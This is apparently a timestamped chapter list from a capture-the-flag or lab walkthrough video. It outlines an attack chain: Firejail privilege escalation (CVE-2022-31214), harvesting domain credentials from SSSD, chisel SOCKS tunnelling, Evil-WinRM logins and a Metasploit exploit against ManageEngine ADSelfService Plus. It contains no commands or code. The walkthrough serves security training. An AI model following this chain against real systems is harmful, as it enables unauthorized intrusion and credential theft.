Shell as www-data, doing some basic recon to figure out what type of virtual e
29:00
Looking at running processes and seeing sssd is running which allows this box
30:00
Looking at SetUID Files, discovering FireJail and privesc'ing CVE-2022-31214
36:00
As root on linux, we can now examine the SSSD configuration and get a domain p
44:50
Setting up a SOCKS Proxy via chisel, so we can use Evil-WINRM to log into the
48:50
Discovering ManageEngine ADSelfService Plus is running, finding an exploit
52:50
Fighting with Chisel to get all the port forwards working, have trouble with t
1:00:00
Redoing our tunnels, doing a portforward on linux to get evil-winrm, then a so
1:06:10
Running the Metasploit Exploit against ManageEngine and getting root
🎓
Tutor Explanation
DeepCamp AI